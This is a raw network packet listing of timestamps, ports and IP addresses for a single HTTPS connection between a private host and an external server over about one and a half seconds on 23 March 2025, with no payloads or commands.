Mar 23, 2025 03:15:51.944502115 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.944600105 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.947340012 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.947417021 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.950922012 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.950998068 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.956773043 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.956854105 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.960186005 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.960267067 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.966589928 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.966665983 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.970487118 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.970577955 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:51.976552010 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:51.976633072 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.240334034 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.240417957 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.240463972 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.240531921 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.240556002 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.240614891 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.244489908 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.244568110 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.251128912 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.251202106 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.254373074 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.254452944 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.260746002 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.260818958 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.264192104 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.264276028 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.267528057 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.267604113 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.273818016 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.273895979 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.276983976 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.277060986 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.283411980 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.283488989 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.286654949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.286729097 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.293251991 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.293319941 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.297389030 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.297465086 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.299499989 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.299571037 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.305996895 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.306075096 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.559770107 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.559854984 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.564419985 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.564491034 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.567643881 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.567708969 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.573914051 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.573990107 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.577254057 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.577311039 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.580476046 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.580548048 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.586957932 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.587023973 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.590437889 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.590536118 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.596559048 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.596633911 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.599991083 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.600056887 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.606331110 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.606396914 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.609620094 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.609680891 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.615848064 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.615906000 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.619338036 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.619400978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.622505903 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.622656107 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.628981113 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.629065037 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.632396936 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.632462025 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.638572931 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.638667107 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.641985893 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.642055988 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.648490906 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.648570061 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.651567936 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.651633978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.654982090 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.655054092 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.658783913 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.658855915 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.664609909 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.664681911 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.667885065 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.667973995 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.674238920 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.674330950 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.680895090 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.680984020 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.683990955 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.684060097 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.687248945 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.687320948 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.690748930 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.690823078 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.696959972 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.697032928 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.700197935 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.700277090 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.706772089 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.706845999 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.710220098 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.710319042 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.716459036 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.716541052 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.719646931 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.719717026 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.722994089 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.723093987 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.729394913 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.729682922 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.732728004 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.732795000 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.739070892 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.739136934 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.742538929 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.742602110 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.748867989 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.748934984 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.752266884 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.752345085 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.755441904 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.755534887 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.761982918 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.762072086 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.765440941 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.765503883 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.771562099 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.771627903 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.878303051 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.878591061 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.879949093 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.880008936 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.883306980 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.883379936 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.889648914 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.889729977 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.892982960 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.893040895 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.896445990 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.896509886 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.902708054 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.902764082 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.906188011 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.906253099 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.912472010 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.912535906 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.915832996 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.915904045 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.922255039 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.922322989 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.925405025 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.925462008 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.928702116 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.928771019 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.935359955 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.935419083 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.938724041 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.938793898 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.944727898 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.944782019 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.948275089 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.948339939 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.954644918 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.954708099 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.957910061 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.957998037 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.961283922 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.961349964 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.967605114 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.967663050 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.970698118 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.970762014 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.977261066 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.977319002 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.980551004 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.980621099 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.987023115 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.987081051 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.990206957 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.990322113 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.993782997 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.993851900 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:52.999916077 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:52.999978065 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.003525972 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.003588915 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.009911060 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.009969950 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.013012886 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.013072014 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.019459963 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.019520044 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.023153067 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.023219109 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.025559902 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.025614977 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.028631926 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.028702021 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.034764051 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.034835100 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.037477970 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.037538052 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.043194056 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.043260098 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.045973063 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.046034098 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.051233053 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.051300049 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.054124117 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.054176092 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.059427977 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.059473991 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.059498072 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.062985897 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.063044071 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.064866066 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.064918995 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.070230961 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.070292950 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.072809935 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.072866917 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.078843117 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.078915119 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.080935001 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.080992937 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.085218906 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.085277081 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.087642908 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.087703943 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.090369940 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.090440989 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.095078945 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.095134974 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.097892046 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.097951889 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.103272915 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.103333950 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.105587006 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.105649948 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.109611988 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.109673023 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.111900091 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.111987114 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.114356041 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.114420891 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.119287968 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.119340897 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.121546030 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.121601105 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.126363039 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.126430035 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.128974915 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.129033089 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.133666992 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.133733988 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.136079073 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.136133909 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.138592005 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.138654947 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.143579006 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.143641949 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.146152020 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.146212101 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.150558949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.150621891 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.153104067 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.153161049 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.157953978 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.158006907 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.160295963 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.160362005 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.162884951 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.162947893 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.165179968 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.165242910 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.169928074 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.169986963 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.172749043 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.172805071 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.177273989 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.177335978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.179805994 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.179874897 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.184604883 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.184667110 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.186970949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.187031984 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.192250013 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.192321062 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.194350004 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.194405079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.196697950 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.196747065 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.200653076 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.200702906 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.202399015 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.202444077 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.205542088 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.205596924 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.207231998 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.207298040 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.210455894 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.210522890 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.212332964 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.212383986 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.213757038 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.213807106 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.216907978 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.216979980 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.218612909 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.218667030 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.221921921 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.221985102 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.223606110 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.223679066 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.226829052 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.226893902 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.228410959 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.228473902 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.231715918 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.231777906 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.234030008 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.234093904 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.234752893 CET	443	49734	39.103.20.80	192.168.2.5
